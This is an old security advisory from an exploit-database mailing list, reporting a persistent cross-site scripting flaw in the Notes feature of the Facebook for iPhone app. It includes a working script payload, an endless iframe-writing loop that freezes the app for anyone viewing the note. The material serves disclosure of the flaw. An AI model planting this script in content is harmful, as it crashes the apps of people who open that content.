Related information

Facebook for iPhone multiple security vulnerabilities

e-Sentinel Security Advisory - Ref: Session Hijacking iPhone Facebook Application ver 3.1.2

From:	Inj3ct0r.com <inj3ct0r_(at)_list.ru>
Date:	05.01.2010
Subject:	Facebook for iPhone persistent XSS

==================================
Facebook for iPhone persistent XSS
==================================



1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                
1   /' \            __  /'__`\        /\ \__  /'__`\              
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___      
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\     
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/      
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\      
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/      
1                  \ \____/ >> Exploit database separated by
exploit   0
0                   \/___/          type (local, remote, DoS,
etc.)    1
1                                                                 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By   : Inj3ct0r
#[+] Site            : Inj3ct0r.com
#[+] support e-mail  : submit[at]inj3ct0r.com


Facebook application for iPhone is not encoding special characters
in
Notes detail

Adding this code in a note will freeze application:

<script>var x = 'x'; while (1) { document.write('<iframe
src="tel:'+x+'"></iframe>'); x = x + 'x'; }</script>

App page:
http://www.facebook.com/apps/application.php?id=6628568379

Download:
http://phobos.apple.com/WebObjects/MZStore.woa/wa/viewSoftware?id=284882215&m
t=8


# ~  - [ [ : Inj3ct0r : ] ]